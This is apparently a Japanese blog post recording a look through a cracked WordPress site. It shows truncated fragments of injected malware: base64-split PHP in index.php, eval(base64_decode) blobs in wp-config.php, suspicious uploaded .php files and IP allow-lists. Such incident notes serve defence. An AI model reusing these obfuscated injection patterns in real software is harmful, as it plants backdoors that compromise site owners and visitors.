ページが開けない、というので、調べてみたら、クラックされたwordpressだったので、いろいろファイルをのぞいてみた記録
ざらっと調べてみたけど、被害範囲がでかすぎたので、最初から作ってもらうしかないです、という回答となりました。
・index.php に下記のような文字列が埋め込まれていた
$GLOBALS['_502176623_']=Array(base64_decode('ZXJyb3Jf' .'cm' .'V' .'wb3' .'J0aW5' .'n'),base64_decode('cHJlZ' .'19tYXRj' .'aA=' .'='),base64_decode('cHJlZ19' .'y' .'Z' .'XBsYW' .'Nl'),base64_decode('c3' .'RycG9' .'z'),base64_decode('' .'bWQ1'),base64_decode('ZnVuY' .'3Rp' .'b25fZXhpc3Rz'),base64_decode('Y3' .'Vy' .'bF9pbml' .'0'),base64_decode('Y' .'3Vyb' .'F9zZ' .'XRvcH' .'Q='),base64_decode('Y' .'3Vyb' .'F9zZXRv' .'cHQ='),base64_decode('Y' .'3V' .'yb' .'F9zZX' .'R' .'vcHQ' <略> +50)){echo $_8;}}elseif(@$GLOBALS['_502176623_'][13](_1644837808(1091))== round(0+0.25+0.25+0.25+0.25)){echo@$GLOBALS['_502176623_'][14]($_6);}} //###==###
・wp-config.php 下記のようなものが数箇所に埋め込まれていた
eval(base64_decode("aWYgKCFkZWZpbmVkKCdBTFJFQURZX1JVTl8xYmMyOWIzNmYzNDJhODJhYWY2NjU4Nzg1MzU2NzE4JykpCnsKZGVmaW5lKCdBTFJFQURZX1JVTl8xYmMyOWIzNmYzNDJhODJhYWY2NjU4Nzg1MzU2NzE4JywgMSk7CgogJGF1YnRvcSA9IDE2MDU7IGZ1bmN0aW9uIHh1Y3dxbXIoJHRidmRoLCAka29pbW5nbHcpeyRuanpuZXhxcSA9ICcnOyB <略> neCc9PidDJywgJ3onPT4nMCcpOwpldmFsLypkeXNwZiovKHh1Y3dxbXIoJGp5Z3h0c2IsICRxemlmeGY pKTsKfQ=="));
・wp-content/uploads/ にいろんなものがアップロードされている
[root@host wp-content]# ls -la uploads/ 合計 56 drwxr-xr-x 5 apache apache 4096 12月 3 11:45 2016 . drwxr-xr-x 7 apache apache 4096 11月 7 12:50 2016 .. -rw-r--r-- 1 apache apache 0 5月 2 09:41 2016 1.php drwxr-xr-x 4 apache apache 4096 10月 10 22:31 2016 2015 drwxr-xr-x 12 apache apache 4096 10月 1 01:17 2016 2016 -rw-r--r-- 1 apache apache 21377 5月 2 09:41 2016 dbc.php.suspected -rw-r--r-- 1 apache apache 1367 11月 7 12:50 2016 jpgjsk.php.suspected -rw-r--r-- 1 apache apache 4902 5月 2 09:41 2016 mates.php.suspected drwxr-xr-x 2 apache apache 4096 12月 13 23:58 2016 ps_auto_sitemap [root@host wp-content]#
・wp-admin/.bt と wp-admin/css/.bt というファイルが作成され、おそらくアクセス許可IPが記載されている
ファイル末尾に追記されるわけではなく、ソートされた順序で増えていっていた
0.5.2.2 0.83.4.1 100.2.201.8 100.35.50.239 100.43.80.14 <略> 99.98.120.94 99.98.2.226 #version:1
・いろんなphpの冒頭が下記のように書き換えられている
<?php $h00d = 846;$GLOBALS['a287']=Array();globa l$a287;<略> $a287['h6d2'][65]]);}exit();} ?><?php /**
・あと、データベースにいろいろデータが突っ込まれていた